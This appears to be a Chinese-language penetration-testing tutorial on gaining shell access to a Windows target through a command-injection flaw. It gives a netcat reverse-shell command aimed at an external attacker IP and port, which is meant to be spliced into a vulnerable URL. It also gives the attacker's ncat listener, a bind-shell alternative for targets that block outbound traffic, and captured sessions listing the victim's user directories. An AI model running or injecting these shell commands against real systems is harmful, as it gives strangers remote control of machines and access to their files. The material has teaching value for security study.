1. 反弹权限
入站严格,出站宽松(出网)
如果靶机是window而刚好有nc命令,如果项目存在反弹shell漏洞,这种情况适用于出站规则不严格的情况下,如果靶机有严格的出站端口,这种方式就不是很适用了,但是可以尝试一些常用的端口,但是这种端口又不能被靶机本身所占用,因为占用了也会反弹端口失败到本机,无法到被控机器
# window 注入命令,一般在漏洞url中拼接反弹命令
C:\Users\linux>nc -e cmd 193.112.95.180 8888
# yum install -y ncat
# 攻击机器
root@VM-8-14-ubuntu:~# ncat -lvvp 8888
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 223.104.43.40.
Ncat: Connection from 223.104.43.40:21059.
Microsoft Windows [�汾 10.0.26100.4484]
(c) Microsoft Corporation����������Ȩ����
C:\Users\linux>whoami
whoami
desktop-can59fe\linux
C:\Users\linux>E:
E:
E:\>dir
dir
������ E �еľ��� ��̬����
��������� E46C-7798
E:\ ��Ŀ¼
2025/06/28 22:37 <DIR> .pnpm-store
2025/05/16 20:38 <DIR> 360Downloads
2025/10/23 23:54 <DIR> BaiduNetdiskDownload
2025/09/08 00:14 <DIR> code
2025/09/22 20:29 12,288 DumpStack.log
2025/10/26 21:41 <DIR> game
2025/07/27 01:38 159 kingdom-come-deliverance-ii-trainer
2023/12/15 10:23 <DIR> Program Files
2025/06/28 19:40 <DIR> Program Files (x86)
2025/10/27 23:34 <DIR> software
2025/10/19 23:17 <DIR> SteamLibrary
2025/06/01 03:28 <DIR> temp
2025/05/13 21:23 <DIR> vivo�ֻ�����
2024/09/28 21:22 <DIR> vm
2025/10/25 00:20 <DIR> vm2
2025/09/27 22:29 <DIR> WeGameApps
2025/07/19 18:45 <DIR> ZtsmEntDownload
2025/10/27 23:34 <DIR> ����
2025/08/20 00:40 <DIR> С��Ӱ
2025/09/01 00:02 <DIR> Ѹ������
2025/09/01 06:12 <DIR> Ѹ������
2 ���ļ� 12,447 �ֽ�
19 ��Ŀ¼ 765,285,363,712 �����ֽ�
入站宽松,出站严格(不出网)
# 靶机在漏洞入口注入等待端口被连接
C:\Users\linux>nc -e cmd -lvp 8888
listening on [any] 8888 ...
# 攻击机连接靶机的端口即可
[root@localhost ~]# nc 172.31.0.1 8888
Microsoft Windows [°汾 10.0.26100.4484]
(c) Microsoft Corporation¡£±£´̹ԐȨ{¡£
C:\Users\linux>whoami
whoami
desktop-can59fe\linux
C:\Users\linux>dir
dir
Ƚ¶¯Ƿ C אµľ ϵͳ
¾�ѲºƊŠA4E6-9D22
C:\Users\linux µń¿¼
2025/10/24 01:17 <DIR> .
2025/04/20 04:03 <DIR> ..
2025/09/25 00:20 <DIR> .android
2025/07/20 04:23 292 .bash_history
2025/05/26 21:35 <DIR> .cache
2025/06/02 23:19 <DIR> .codingCopilot
2024/01/16 22:30 <DIR> .config
2025/09/07 06:03 <DIR> .cursor
2025/10/09 02:22 413 .cursor_info
2025/04/20 02:38 16 .emulator_console_auth_token
2025/06/05 08:34 142 .gitconfig
2025/08/24 01:43 <DIR> .gongfeng_copilot
2025/09/24 22:17 <DIR> .gradle
2025/05/11 23:32 <DIR> .jdks
2025/08/16 16:21 <DIR> .leigod
2025/05/26 04:01 20 .lesshst
2025/05/24 20:59 <DIR> .m2
2025/06/02 05:26 152 .npmrc
2025/06/28 22:34 <DIR> .pnpm
2025/06/28 22:34 <DIR> .pnpm-cache
2025/06/28 22:34 <DIR> .pnpm-state
2025/09/07 07:39 <DIR> .qoder
2025/06/28 21:49 <DIR> .redhat
2025/08/09 22:51 <DIR> .vscode
2025/03/16 13:09 3,465 AMDRM_Install.log
2025/03/16 13:10 3,721,722 AMD_RyzenMaster.log
评论